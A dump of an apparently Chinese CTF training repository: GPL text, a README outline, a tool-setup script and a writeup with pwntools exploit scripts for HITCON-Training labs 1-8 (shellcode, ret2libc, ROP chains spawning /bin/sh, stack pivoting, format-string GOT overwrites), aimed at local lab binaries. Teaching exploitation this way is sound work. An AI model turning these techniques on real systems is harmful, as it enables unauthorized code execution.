| IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | {one line to give the program's name and a brief idea of what it does.} 635 | Copyright (C) {year} {name of author} 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | {project} Copyright (C) {year} {fullname} 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /Pic/深度截图_选择区域_20180314213356.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/Pic/深度截图_选择区域_20180314213356.png -------------------------------------------------------------------------------- /Pic/深度截图_选择区域_20180314213554.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/Pic/深度截图_选择区域_20180314213554.png -------------------------------------------------------------------------------- /Pic/深度截图_选择区域_20180314213803.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/Pic/深度截图_选择区域_20180314213803.png -------------------------------------------------------------------------------- /Pic/深度截图_选择区域_20180314214002.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/Pic/深度截图_选择区域_20180314214002.png -------------------------------------------------------------------------------- /Pic/深度截图_选择区域_20180314222026.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bash-c/HITCON-Training-Writeup/8a3e329d2f8a5ad1e0947a80bdde90d79e71d873/Pic/深度截图_选择区域_20180314222026.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HITCON-Training 2 | > I made a brief writeup for [scwuaptx/HITCON-Training](https://github.com/scwuaptx/HITCON-Training) 3 | > 4 | > See writeup [here](https://github.com/M4xW4n9/HITCON-Training-Writeup/blob/master/writeup.md) 5 | For Linux binary Exploitation 6 | 7 | ## Environment Setup 8 | 9 | git clone https://github.com/scwuaptx/HITCON-Training.git ~/ 10 | cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 11 | 12 | ## Outline 13 | 14 | + Basic Knowledge 15 | + Introduction 16 | + Reverse Engineering 17 | + Static Analysis 18 | + Dynamic Analysis 19 | + Exploitation 20 | + Useful Tool 21 | + IDA PRO 22 | + GDB 23 | + Pwntool 24 | + lab 1 - sysmagic 25 | + Section 26 | + Compile,linking,assmbler 27 | + Execution 28 | + how program get run 29 | + Segment 30 | + x86 assembly 31 | + Calling convention 32 | + lab 2 - open/read/write 33 | + shellcoding 34 | + Stack Overflow 35 | + Buffer Overflow 36 | + Return to Text/Shellcode 37 | + lab 3 - ret2shellcode 38 | + Protection 39 | + ASLR/DEP/PIE/StackGuard 40 | + Lazy binding 41 | + Return to Library 42 | + lab 4 - ret2lib 43 | + Return Oriented Programming 44 | + ROP 45 | + lab 5 - simple rop 46 | + Using ROP bypass ASLR 47 | + ret2plt 48 | + Stack migration 49 | + lab 6 - migration 50 | + Format String Attack 51 | + Format String 52 | + Read from arbitrary memory 53 | + lab 7 - crack 54 | + Write to arbitrary memory 55 | + lab 8 - craxme 56 | + Advanced Trick 57 | + EBP chain 58 | + lab 9 - playfmt 59 | + x64 Binary Exploitation 60 | + x64 assembly 61 | + ROP 62 | + Format string Attack 63 | 64 | + Heap exploitation 65 | + Glibc memory allocator overview 66 | + Vulnerablility on heap 67 | + Use after free 68 | + lab 10 - hacknote 69 | + Heap overflow 70 | + house of force 71 | + lab 11 - 1 - bamboobox1 72 | + unlink 73 | + lab 11 - 2 - bamboobox2 74 | + Advanced heap exploitation 75 | + Fastbin attack 76 | + lab 12 - babysecretgarden 77 | + Shrink the chunk 78 | + Extend the chunk 79 | + lab 13 - heapcreator 80 | + Unsortbin attack 81 | + lab 14 - magicheap 82 | + C++ Exploitation 83 | + Name Mangling 84 | + Vtable fucntion table 85 | + Vector & String 86 | + New & delete 87 | + Copy constructor & assignment operator 88 | + lab 15 - zoo 89 | + 那些 Pwning 的奇淫技巧: 90 | -------------------------------------------------------------------------------- /env_setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | sudo apt-get -y update 4 | sudo apt-get -y upgrade 5 | sudo apt-get -y install binutils nasm 6 | sudo apt-get -y install gcc-multilib g++-multilib 7 | sudo apt-get -y install libc6-dev-i386 8 | sudo apt-get -y install git 9 | sudo apt-get -y install libc6-dbg libc6-dbg:i386 10 | sudo apt-get -y install nmap 11 | sudo apt-get -y install python-pip libssl-dev 12 | sudo apt-get -y install gdb 13 | sudo pip install --upgrade pip 14 | sudo pip install --upgrade capstone 15 | sudo pip install --upgrade pwntools 16 | sudo pip install ropgadget 17 | git clone https://github.com/scwuaptx/peda.git ~/peda 18 | cp ~/peda/.inpurc ~/ 19 | git clone https://github.com/scwuaptx/Pwngdb.git 20 | cp ~/Pwngdb/.gdbinit ~/ 21 | git clone https://github.com/JonathanSalwan/ROPgadget 22 | -------------------------------------------------------------------------------- /writeup.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "HITCON-Training-Writeup" 3 | date: 2018-07-03T12:05:10+08:00 4 | draft: false 5 | --- 6 | 7 | 8 | # HITCON-Training-Writeup 9 | 10 | > ~~原文链接[M4x@10.0.0.55](http://www.cnblogs.com/WangAoBo/p/8570640.html)~~ 11 | 12 | > 原文链接[M4x@10.0.0.55](http://m4x.fun/post/hitcon-training-writeup/) 13 | 14 | > 项目地址[M4x's github](https://github.com/0x01f/HITCON-Training-Writeup),欢迎 star~ 15 | 16 | 17 | 复习一下二进制基础,写写 HITCON-Training 的 writeup,题目地址:https://github.com/scwuaptx/HITCON-Training 18 | 19 | ## Outline 20 | 21 | - Basic Knowledge 22 | - Introduction 23 | - Reverse Engineering 24 | - Static Analysis 25 | - Dynamic Analysis 26 | - Exploitation 27 | - Useful Tool 28 | - IDA PRO 29 | - GDB 30 | - Pwntool 31 | - lab 1 - sysmagic 32 | - Section 33 | - Compile,linking,assmbler 34 | - Execution 35 | - how program get run 36 | - Segment 37 | - x86 assembly 38 | - Calling convention 39 | - lab 2 - open/read/write 40 | - shellcoding 41 | - Stack Overflow 42 | - Buffer Overflow 43 | - Return to Text/Shellcode 44 | - lab 3 - ret2shellcode 45 | - Protection 46 | - ASLR/DEP/PIE/StackGuard 47 | - Lazy binding 48 | - Return to Library 49 | - lab 4 - ret2lib 50 | - Return Oriented Programming 51 | - ROP 52 | - lab 5 - simple rop 53 | - Using ROP bypass ASLR 54 | - ret2plt 55 | - Stack migration 56 | - lab 6 - migration 57 | - Format String Attack 58 | - Format String 59 | - Read from arbitrary memory 60 | - lab 7 - crack 61 | - Write to arbitrary memory 62 | - lab 8 - craxme 63 | - Advanced Trick 64 | - EBP chain 65 | - lab 9 - playfmt 66 | - x64 Binary Exploitation 67 | - x64 assembly 68 | - ROP 69 | - Format string Attack 70 | - Heap exploitation 71 | - Glibc memory allocator overview 72 | - Vulnerablility on heap 73 | - Use after free 74 | - lab 10 - hacknote 75 | - Heap overflow 76 | - house of force 77 | - lab 11 - 1 - bamboobox1 78 | - unlink 79 | - lab 11 - 2 - bamboobox2 80 | - Advanced heap exploitation 81 | - Fastbin attack 82 | - lab 12 - babysecretgarden 83 | - Shrink the chunk 84 | - Extend the chunk 85 | - lab 13 - heapcreator 86 | - Unsortbin attack 87 | - lab 14 - magicheap 88 | - C++ Exploitation 89 | - Name Mangling 90 | - Vtable fucntion table 91 | - Vector & String 92 | - New & delete 93 | - Copy constructor & assignment operator 94 | - lab 15 - zoo 95 | 96 | 97 | 98 | ## Writeup 99 | 100 | ### lab1-sysmagic 101 | 102 | 一个很简单的逆向题,看 get\_flag 函数的逻辑逆回来即可,直接逆向的方法就不说了 103 | 104 | 或者经过观察,flag 的生成与输入无关,因此可以通过 patch 或者调试直接获得 flag 105 | 106 | #### patch 107 | 108 | ![](http://ww1.sinaimg.cn/large/006AWYXBly1fpcpmdngq8j30ja047dg7.jpg) 109 | 110 | 修改关键判断即可,patch 后保存运行,输入任意值即可得 flag 111 | 112 | ![](http://ww1.sinaimg.cn/large/006AWYXBly1fpcpmkyf79j30ez03emxy.jpg) 113 | 114 | #### 调试 115 | 116 | 通过观察汇编,我们只需使下图的 cmp 满足即可,可以通过 gdb 调试,在调试过程中手动满足该条件 117 | 118 | ![](http://ww1.sinaimg.cn/large/006AWYXBly1fpcpngmh9cj30f904gdfx.jpg) 119 | 120 | 直接写出 gdb 脚本 121 | 122 | ```shell 123 | lab1 [master●●] cat solve 124 | b *get_flag+389 125 | r 126 | #your input 127 | set $eax=$edx 128 | c 129 | lab1 [master●●] 130 | ``` 131 | 132 | 也可得到 flag 133 | 134 | ![](http://ww1.sinaimg.cn/large/006AWYXBly1fpcpmxbneij30qu0c5dll.jpg) 135 | 136 | 同时注意,IDA 对字符串的识别出了问题,修复方法可以参考 inndy 的 [**ROP2**](http://www.cnblogs.com/WangAoBo/p/7706719.html) 137 | 138 | ### lab2-orw.bin 139 | 140 | 通过查看 prctl 的 man 手册发现该程序限制了一部分系统调用,根据题目的名字 open, read, write以及IDA分析,很明显是要我们自己写读取并打印 flag 的 shellcode 了,偷个懒,直接调用 shellcraft 模块 141 | 142 | ```python 143 | lab2 [master●●] cat solve.py 144 | #!/usr/bin/env python 145 | # -*- coding: utf-8 -*- 146 | __Auther__ = 'M4x' 147 | 148 | from pwn import * 149 | from pwn import shellcraft as sc 150 | context.log_level = "debug" 151 | 152 | shellcode = sc.pushstr("/home/m4x/HITCON-Training/LAB/lab2/testFlag") 153 | shellcode += sc.open("esp") 154 | # open返回的文件文件描述符存贮在eax寄存器里 155 | shellcode += sc.read("eax", "esp", 0x100) 156 | # open读取的内容放在栈顶 157 | shellcode += sc.write(1, "esp", 0x100) 158 | 159 | io = process("./orw.bin") 160 | io.sendlineafter("shellcode:", asm(shellcode)) 161 | print io.recvall() 162 | io.close() 163 | lab2 [master●●] 164 | ``` 165 | 166 | 该题与 pwnable.tw 的 orw 类似,那道题的 writeup 很多,因此就不说直接撸汇编的方法了 167 | 168 | ### lab3-ret2sc 169 | 170 | 很简单的 ret2shellcode,程序没有开启 NX 和 canary 保护,把 shellcode 存贮在 name 这个全局变量上,并 ret 到该地址即可 171 | 172 | ```python 173 | lab3 [master●●] cat solve.py 174 | #!/usr/bin/env python 175 | # -*- coding: utf-8 -*- 176 | __Auther__ = 'M4x' 177 | 178 | from pwn import * 179 | context(os = "linux", arch = "i386") 180 | 181 | io = process("./ret2sc") 182 | 183 | shellcode = asm(shellcraft.execve("/bin/sh")) 184 | io.sendlineafter(":", shellcode) 185 | 186 | payload = flat(cyclic(32), 0x804a060) 187 | io.sendlineafter(":", payload) 188 | 189 | io.interactive() 190 | io.close() 191 | lab3 [master●●] 192 | ``` 193 | 194 | 需要注意的是,该程序中的 read 是通过 esp 寻址的,因此具体的 offset 可以通过调试查看 195 | 196 | ![](http://ww1.sinaimg.cn/large/006AWYXBly1fpcpljuki5j30g702wdfy.jpg) 197 | 198 | 也可以通过 peda 的 pattern\_offset/pattern\_search , pwntools 的 cyclic/cyclic -l 等工具来找 offset 199 | 200 | 201 | 202 | ### lab4-ret2lib 203 | 204 | ret2libc,并且程序中已经有了一个可以查看 got 表中值的函数 See\_something,直接 leak 出 libc 基址,通过 one\_gadget 或者 system("/bin/sh") 都可以 get shell,/bin/sh 可以使用 libc 中的字符串,可以通过 read 读入到内存中,也可以使用 binary 中的字符串 205 | 206 | ```python 207 | lab4 [master●●] cat solve.py 208 | #!/usr/bin/env python 209 | # -*- coding: utf-8 -*- 210 | __Auther__ = 'M4x' 211 | 212 | from pwn import * 213 | 214 | io = process("./ret2lib") 215 | elf = ELF("./ret2lib") 216 | libc = ELF("/lib/i386-linux-gnu/libc.so.6") 217 | 218 | io.sendlineafter(" :", str(elf.got["puts"])) 219 | io.recvuntil(" : ") 220 | libcBase = int(io.recvuntil("\n", drop = True), 16) - libc.symbols["puts"] 221 | 222 | success("libcBase -> {:#x}".format(libcBase)) 223 | # oneGadget = libcBase + 0x3a9fc 224 | 225 | # payload = flat(cyclic(60), oneGadget) 226 | payload = flat(cyclic(60), libcBase + libc.symbols["system"], 0xdeadbeef, next(elf.search("sh\x00"))) 227 | io.sendlineafter(" :", payload) 228 | 229 | io.interactive() 230 | io.close() 231 | lab4 [master●●] 232 | ``` 233 | 234 | ### lab5-simplerop 235 | 236 | 本来看程序是静态链接的,想通过 ROPgadget/ropper 等工具生成的 ropchain 一波带走,但实际操作时发现 read 函数只允许读入 100 个字符,去除 buf 到 main 函数返回地址的偏移为 32,我们一共有 100 - 32 = 68 的长度来构造 ropchain,而 ropper/ROPgadget 等自动生成的 ropchain 都大于这个长度,这就需要我们精心设计 ropchain 了,这里偷个懒,优化一下 ropper 生成的 ropchain 来缩短长度 237 | 238 | > ropper --file ./simplerop --chain "execve cmd=/bin/sh" 239 | > 240 | > ROPgadget --binary ./simplerop --ropchain 241 | 242 | 先看一下 ropper 生成的 ropchain 243 | 244 | ```python 245 | #!/usr/bin/env python 246 | # Generated by ropper ropchain generator # 247 | from struct import pack 248 | 249 | p = lambda x : pack('I', x) 250 | 251 | IMAGE_BASE_0 = 0x08048000 # ./simplerop 252 | rebase_0 = lambda x : p(x + IMAGE_BASE_0) 253 | 254 | rop = '' 255 | 256 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 257 | rop += '//bi' 258 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 259 | rop += rebase_0(0x000a3060) 260 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 261 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 262 | rop += 'n/sh' 263 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 264 | rop += rebase_0(0x000a3064) 265 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 266 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 267 | rop += p(0x00000000) 268 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 269 | rop += rebase_0(0x000a3068) 270 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 271 | rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret; 272 | rop += rebase_0(0x000a3060) 273 | rop += rebase_0(0x0009e910) # 0x080e6910: pop ecx; push cs; or al, 0x41; ret; 274 | rop += rebase_0(0x000a3068) 275 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 276 | rop += rebase_0(0x000a3068) 277 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 278 | rop += p(0x0000000b) 279 | rop += rebase_0(0x00026ef0) # 0x0806eef0: int 0x80; ret; 280 | print rop 281 | [INFO] rop chain generated! 282 | ``` 283 | 284 | 简单介绍一下原理,通过一系列 pop|ret 等gadget,使得 eax = 0xb(execve 32 位下的系统调用号),ebx -> /bin/sh, ecx = edx = 0,然后通过 `int 0x80` 实现系统调用,执行 execve("/bin/sh", 0, 0),实际上构造了一个 ret2syscall 的rop chain, hackme.inndy 上也有一道类似的题目[**ROP2**](http://www.cnblogs.com/WangAoBo/p/7706719.html#_label3) 285 | > ret2syscall 的更多细节可以参考 [ctf-wiki](https://ctf-wiki.github.io/ctf-wiki/pwn/stackoverflow/basic_rop/#ret2syscall) 286 | 287 | 而当观察 ropper 等工具自动生成的 ropchain 时,会发现有很多步骤是很繁琐的,可以做出很多优化,给一个优化后的例子 288 | 289 | ```python 290 | #!/usr/bin/env python 291 | # Generated by ropper ropchain generator # 292 | from struct import pack 293 | 294 | p = lambda x : pack('I', x) 295 | 296 | IMAGE_BASE_0 = 0x08048000 # ./simplerop 297 | rebase_0 = lambda x : p(x + IMAGE_BASE_0) 298 | 299 | pop_edx_ecx_ebx = 0x0806e850 300 | 301 | rop = '' 302 | 303 | # write /bin/sh\x00 to 0x08048000 + 0x000a3060 304 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 305 | # rop += '//bi' 306 | rop += '/bin' 307 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 308 | rop += rebase_0(0x000a3060) 309 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 310 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 311 | rop += '/sh\x00' 312 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 313 | rop += rebase_0(0x000a3064) 314 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 315 | print "[+]write /bin/sh\x00 to 0x08048000 + 0x000a3060" 316 | 317 | # rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 318 | # rop += p(0x00000000) 319 | # rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 320 | # rop += rebase_0(0x000a3068) 321 | # rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 322 | # rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret; 323 | # rop += rebase_0(0x000a3060) 324 | # rop += rebase_0(0x0009e910) # 0x080e6910: pop ecx; push cs; or al, 0x41; ret; 325 | # rop += rebase_0(0x000a3068) 326 | # rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 327 | # rop += rebase_0(0x000a3068) 328 | 329 | # set ebx -> /bin/sh\x00, ecx = edx = 0 330 | rop += pack('I', pop_edx_ecx_ebx) 331 | rop += p(0) 332 | rop += p(0) 333 | rop += rebase_0(0x000a3060) 334 | print "[+]set ebx -> /bin/sh\x00, ecx = edx = 0" 335 | 336 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 337 | rop += p(0x0000000b) 338 | rop += rebase_0(0x00026ef0) # 0x0806eef0: int 0x80; ret; 339 | asset len(rop) <= 100 - 32 340 | ``` 341 | 342 | 注释都已经写在代码里了,主要优化了将 /bin/sh\x00 读入以及设置 ebx,ecx,edx 等寄存器的过程 343 | 344 | > 或者直接 return 到 read 函数,将 /bin/sh\x00 read 到 bss/data 段,能得到更短的 ropchain, 解决方法有很多,不再细说 345 | 346 | 最终脚本: 347 | 348 | ```python 349 | lab5 [master●●] cat solve.py 350 | #!/usr/bin/env python 351 | # -*- coding: utf-8 -*- 352 | __Auther__ = 'M4x' 353 | 354 | from pwn import * 355 | from struct import pack 356 | 357 | p = lambda x : pack('I', x) 358 | 359 | IMAGE_BASE_0 = 0x08048000 # ./simplerop 360 | rebase_0 = lambda x : p(x + IMAGE_BASE_0) 361 | 362 | pop_edx_ecx_ebx = 0x0806e850 363 | 364 | rop = '' 365 | 366 | # write /bin/sh\x00 to 0x08048000 + 0x000a3060 367 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 368 | # rop += '//bi' 369 | rop += '/bin' 370 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 371 | rop += rebase_0(0x000a3060) 372 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 373 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 374 | rop += '/sh\x00' 375 | rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 376 | rop += rebase_0(0x000a3064) 377 | rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 378 | print "[+]write /bin/sh\x00 to 0x08048000 + 0x000a3060" 379 | 380 | # rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 381 | # rop += p(0x00000000) 382 | # rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 383 | # rop += rebase_0(0x000a3068) 384 | # rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 385 | # rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret; 386 | # rop += rebase_0(0x000a3060) 387 | # rop += rebase_0(0x0009e910) # 0x080e6910: pop ecx; push cs; or al, 0x41; ret; 388 | # rop += rebase_0(0x000a3068) 389 | # rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 390 | # rop += rebase_0(0x000a3068) 391 | 392 | # set ebx -> /bin/sh\x00, ecx = edx = 0 393 | rop += pack('I', pop_edx_ecx_ebx) 394 | rop += p(0) 395 | rop += p(0) 396 | rop += rebase_0(0x000a3060) 397 | print "[+]set ebx -> /bin/sh\x00, ecx = edx = 0" 398 | 399 | rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 400 | rop += p(0x0000000b) 401 | rop += rebase_0(0x00026ef0) # 0x0806eef0: int 0x80; ret; 402 | assert len(rop) <= 100 - 32 403 | 404 | io = process("./simplerop") 405 | 406 | payload = cyclic(32) + rop 407 | io.sendlineafter(" :", payload) 408 | 409 | io.interactive() 410 | io.close() 411 | ``` 412 | 413 | ### lab6-migration 414 | 415 | 栈迁移的问题,可以看出这个题目比起暴力的栈溢出做了两点限制: 416 | 417 | - 每次溢出只有 0x40-0x28-0x4=**20** 个字节的长度可以构造 ropchain 418 | 419 | - 通过 420 | 421 | ```C 422 | if ( count != 1337 ) 423 | exit(1); 424 | ``` 425 | 426 | 限制了我们只能利用一次 main 函数的溢出(如果能 leak 出栈地址的话, 可以在栈上构造 rop chain 并控制返回地址 ret 到栈上的 rop chain) 427 | 428 | 所以我们就只能通过 20 个字节的 ropchain 来进行 rop 了,关于栈迁移(又称为 stack-pivot)可以看这个 [**slide**](https://github.com/M4xW4n9/slides/blob/master/pwn_stack/DEP%20%26%20ROP.pdf%0A) 429 | > [ctf-wiki](https://ctf-wiki.github.io/ctf-wiki/pwn/stackoverflow/others/#stack-pivoting) 上对 stack pivot 也有较为详细的介绍 430 | 431 | ![stackPivot](https://raw.githubusercontent.com/M4xW4n9/slides/master/pwn_stack/stackPivot.jpg) 432 | 433 | 我的exp: 434 | 435 | ```python 436 | lab6 [master●●] cat solve.py 437 | #!/usr/bin/env python 438 | # -*- coding: utf-8 -*- 439 | __Auther__ = 'M4x' 440 | 441 | from pwn import * 442 | from time import sleep 443 | context.log_level = "debug" 444 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 445 | def DEBUG(): 446 | raw_input("DEBUG: ") 447 | gdb.attach(io) 448 | 449 | elf = ELF("./migration") 450 | libc = elf.libc 451 | 452 | # bufAddr = elf.bss() 453 | bufAddr = 0x0804a000 454 | readPlt = elf.plt["read"] 455 | readGot = elf.got["read"] 456 | putsPlt = elf.plt["puts"] 457 | p1ret = 0x0804836d 458 | p3ret = 0x08048569 459 | leaveRet = 0x08048504 460 | 461 | 462 | io = process("./migration") 463 | # DEBUG() 464 | payload = flat([cyclic(0x28), bufAddr + 0x100, readPlt, leaveRet, 0, bufAddr + 0x100, 0x100]) 465 | io.sendafter(" :\n", payload) 466 | sleep(0.1) 467 | 468 | payload = flat([bufAddr + 0x600, putsPlt, p1ret, readGot, readPlt, leaveRet, 0, bufAddr + 0x600, 0x100]) 469 | io.send(payload) 470 | sleep(0.1) 471 | # print io.recv() 472 | libcBase = u32(io.recv()[: 4]) - libc.sym['read'] 473 | success("libcBase -> {:#x}".format(libcBase)) 474 | pause() 475 | 476 | payload = flat([bufAddr + 0x100, readPlt, p3ret, 0, bufAddr + 0x100, 0x100, libcBase + libc.sym['system'], 0xdeadbeef, bufAddr + 0x100]) 477 | io.send(payload) 478 | sleep(0.1) 479 | io.send("$0\0") 480 | sleep(0.1) 481 | 482 | io.interactive() 483 | io.close() 484 | ``` 485 | 486 | 稍微解释一下,先通过主函数中可以控制的 20个 字节将 esp 指针劫持到可控的 bss 段,然后就可以可以在 bss 段为所欲为了。 487 | 488 | 关于 stack-pivot,pwnable.kr 的 simple\_login 是很经典的题目,放上一篇这道题的很不错的 [**wp**](https://blog.csdn.net/yuanyunfeng3/article/details/51456049) 489 | 490 | 这个还有个问题,sendline 会 gg,send 就可以,在 atum 大佬的 [**博客**](http://atum.li/2016/09/20/ctf-strange/) 上找到了原因 491 | 另外不建议把迁移后的栈放在 bss 段开头, 因为 stdout, stdin, stderr 等结构体往往存储在这里, 破坏这些结构体很可能会引起输入输出的错误 492 | 493 | ### lab7-crack 494 | 495 | 输出 name 时有明显的格式化字符串漏洞,这个题的思路有很多,可以利用 fsb 改写 password,或者 leak 出 password,也可以直接通过 fsb,hijack puts\_got 到 system("cat flag") 处(注意这里 printf 实际调用了 puts) 496 | 497 | ```python 498 | lab7 [master●●] cat hijack.py 499 | #!/usr/bin/env python 500 | # -*- coding: utf-8 -*- 501 | __Auther__ = 'M4x' 502 | 503 | from pwn import * 504 | 505 | putsGot = 0x804A01C 506 | bullet = 0x804872B 507 | 508 | io = process("./crack") 509 | payload = fmtstr_payload(10, {putsGot: bullet}) 510 | io.sendlineafter(" ? ", payload) 511 | 512 | io.sendline() 513 | io.interactive() 514 | io.close() 515 | lab7 [master●●] cat overwrite.py 516 | #!/usr/bin/env python 517 | # -*- coding: utf-8 -*- 518 | __Auther__ = 'M4x' 519 | 520 | from pwn import * 521 | 522 | pwdAddr = 0x804A048 523 | payload = fmtstr_payload(10, {pwdAddr: 6}) 524 | 525 | io = process("./crack") 526 | 527 | io.sendlineafter(" ? ", payload) 528 | io.sendlineafter(" :", "6") 529 | 530 | io.interactive() 531 | io.close() 532 | lab7 [master●●] cat leak.py 533 | #!/usr/bin/env python 534 | # -*- coding: utf-8 -*- 535 | __Auther__ = 'M4x' 536 | 537 | from pwn import * 538 | 539 | pwdAddr = 0x804A048 540 | payload = p32(pwdAddr) + "|%10$s||" 541 | 542 | io = process("./crack") 543 | io.sendlineafter(" ? ", payload) 544 | io.recvuntil("|") 545 | leaked = u32(io.recvuntil("||", drop = True)) 546 | io.sendlineafter(" :", str(leaked)) 547 | 548 | io.interactive() 549 | io.close() 550 | ``` 551 | 552 | 32位的 binary 可以直接使用 pwntools 封装好的**fmtstr\_payload**函数: 553 | 554 | ![](http://ww1.sinaimg.cn/large/006AWYXBly1fq2zoc31gjj30om0p3jv2.jpg) 555 | 556 | ### lab8-craxme 557 | 558 | 同样是32位的 fsb,直接用 fmtstr\_payload 就可以解决 559 | 560 | ```python 561 | lab8 [master●●] cat solve.py 562 | #!/usr/bin/env python 563 | # -*- coding: utf-8 -*- 564 | __Auther__ = 'M4x' 565 | 566 | from pwn import * 567 | from sys import argv 568 | context.log_level = "debug" 569 | 570 | magicAddr = ELF("./craxme").sym["magic"] 571 | 572 | if argv[1] == "1": 573 | payload = fmtstr_payload(7, {magicAddr: 0xda}) 574 | else: 575 | payload = fmtstr_payload(7, {magicAddr: 0xfaceb00c}) 576 | 577 | io = process("./craxme") 578 | 